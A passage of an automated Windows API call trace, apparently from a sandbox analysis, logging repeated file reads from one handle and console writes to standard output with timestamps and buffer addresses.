lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.752] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.753] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.753] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, 
lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] GetFileType (hFile=0x4c) returned 0x1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] GetFileType (hFile=0x4c) returned 0x1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: 
lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.754] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] GetFileType (hFile=0x4c) returned 0x1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, 
lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 
lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, 
lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, 
lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 